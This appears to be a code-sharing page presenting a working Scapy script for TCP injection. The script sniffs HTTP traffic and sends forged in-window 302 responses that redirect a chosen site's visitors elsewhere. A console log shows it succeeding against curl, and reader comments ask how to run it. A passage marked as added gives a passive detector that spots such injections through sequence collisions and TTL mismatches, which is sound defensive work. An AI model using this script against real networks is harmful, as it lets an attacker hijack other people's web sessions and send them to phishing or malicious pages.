TCP injection attack (HTTP redirection) using Scapy
```console
$ sudo python tcp_http_spoof.py >&/dev/null &
[1] 3477
$ curl -vL http://www.google.com/
* Hostname was NOT found in DNS cache
* Trying 172.217.26.100...
* Connected to www.google.com (172.217.26.100) port 80 (#0)
> GET / HTTP/1.1
> User-Agent: curl/7.35.0
> Host: www.google.com
> Accept: */*
>
< HTTP/1.1 302 Found
< Location: http://www.example.com/
< Content-Length: 0
< Connection: close
<
* Closing connection 0
* Issue another request to this URL: 'http://www.example.com/'
* Hostname was NOT found in DNS cache
* Trying 93.184.216.34...
* Connected to www.example.com (93.184.216.34) port 80 (#1)
> GET / HTTP/1.1
> User-Agent: curl/7.35.0
> Host: www.example.com
> Accept: */*
>
< HTTP/1.1 200 OK
< Accept-Ranges: bytes
< Cache-Control: max-age=604800
< Content-Type: text/html
< Date: Mon, 08 Aug 2016 16:28:39 GMT
< Etag: "359670651+gzip"
< Expires: Mon, 15 Aug 2016 16:28:39 GMT
< Last-Modified: Fri, 09 Aug 2013 23:54:35 GMT
* Server ECS (cpm/F9D5) is not blacklisted
< Server: ECS (cpm/F9D5)
< Vary: Accept-Encoding
< X-Cache: HIT
< x-ec-custom-error: 1
< Content-Length: 1270
<
<!doctype html>
(snip)
* Connection #1 to host www.example.com left intact
```
```python
from scapy.all import *


class TCP_HTTP_am(AnsweringMachine):
    # Scapy AnsweringMachine: sniff with `filter`, and for every packet that
    # satisfies is_request(), send the packet built by make_reply().
    function_name = "TCP_HTTP_spoof"
    filter = "tcp port 80"

    def parse_options(self, target_host="www.google.com", redirect_url='http://www.example.com/'):
        self.target_host = target_host
        self.redirect_url = redirect_url

    def is_request(self, req):
        # Only answer segments whose payload carries an HTTP Host header for the target host.
        # (Written for Python 2 string semantics; under Python 3 the Raw load is bytes.)
        return req.haslayer(Raw) and ("Host: %s" % self.target_host in req.getlayer(Raw).load)

    def make_reply(self, req):
        ip = req.getlayer(IP)
        tcp = req.getlayer(TCP)
        http_payload = "HTTP/1.1 302 Found\r\nLocation: %s\r\nContent-Length: 0\r\nConnection: close\r\n\r\n" % self.redirect_url
        # Swap addresses and ports, and take seq/ack from the request so the forged
        # reply is in-window: seq = the client's ack, ack = request seq + payload length.
        # (ip.sport / ip.dport resolve through the TCP layer in Scapy.)
        resp = IP(dst=ip.src, src=ip.dst) / TCP(dport=ip.sport, sport=ip.dport, flags="PA", seq=tcp.ack, ack=tcp.seq+len(tcp.payload)) / Raw(load=http_payload)
        return resp


if __name__ == '__main__':
    conf.L3socket = L3RawSocket
    TCP_HTTP_am()()
```
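A defender-side check, added here as an example and not part of the gist: because the forged reply sets seq to the client's ack, exactly where the genuine server resumes, the real response later arrives carrying different data at the same sequence number, and (coming from a different hop distance) usually with a different IP TTL. A passive monitor can flag both. Pure Python, no Scapy; the flow records, the client address 10.0.0.5 and the port 40000 are constructed.

```python
from collections import defaultdict, namedtuple

# Minimal view of one TCP segment; the records below are constructed, not parsed from a pcap.
Segment = namedtuple("Segment", "src dst sport dport seq ttl payload")


def find_injections(segments):
    """Flag segments that conflict with earlier traffic in the same direction of a flow.

    Two passive heuristics:
      1. the same sequence number reappears carrying different data: the forged
         reply uses seq = client's ack, exactly where the genuine server resumes,
         so both responses collide at one sequence number;
      2. the IP TTL differs from what this side of the flow has used so far,
         since a spoofed packet comes from a different hop distance.
    Returns a list of (index, reason) tuples; exact-seq matching only, a full
    detector would compare overlapping byte ranges.
    """
    data_at_seq = defaultdict(dict)   # flow -> {seq: payload}
    ttls_seen = defaultdict(set)      # flow -> TTLs observed so far
    alerts = []
    for i, s in enumerate(segments):
        flow = (s.src, s.sport, s.dst, s.dport)
        if ttls_seen[flow] and s.ttl not in ttls_seen[flow]:
            alerts.append((i, "ttl %d differs from flow ttl(s) %s" % (s.ttl, sorted(ttls_seen[flow]))))
        ttls_seen[flow].add(s.ttl)
        if s.payload:
            prior = data_at_seq[flow].get(s.seq)
            if prior is None:
                data_at_seq[flow][s.seq] = s.payload
            elif prior != s.payload:
                alerts.append((i, "seq %d already carried different data" % s.seq))
    return alerts


# Constructed sample: client 10.0.0.5 talks to 172.217.26.100:80; a forged 302
# (TTL 64, from the local segment) races the genuine 200 (TTL 57) at seq 1001.
SERVER, CLIENT = "172.217.26.100", "10.0.0.5"
SAMPLE = [
    Segment(SERVER, CLIENT, 80, 40000, 1000, 57, b""),                       # SYN-ACK
    Segment(CLIENT, SERVER, 40000, 80, 5000, 64,
            b"GET / HTTP/1.1\r\nHost: www.google.com\r\n\r\n"),             # request
    Segment(SERVER, CLIENT, 80, 40000, 1001, 64,
            b"HTTP/1.1 302 Found\r\nLocation: http://www.example.com/\r\n\r\n"),  # forged
    Segment(SERVER, CLIENT, 80, 40000, 1001, 57,
            b"HTTP/1.1 200 OK\r\n\r\n<!doctype html>"),                      # genuine
]
```

Running `find_injections(SAMPLE)` reports the forged segment for its TTL and the genuine one for the sequence collision; the collision alone only says that one of the two is forged, the TTL tells which.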
I believe the program makes the response packet but does not send it.
Is this basically SSL stripping?
How to use it on an Ubuntu machine as a script? I cannot redirect any IP.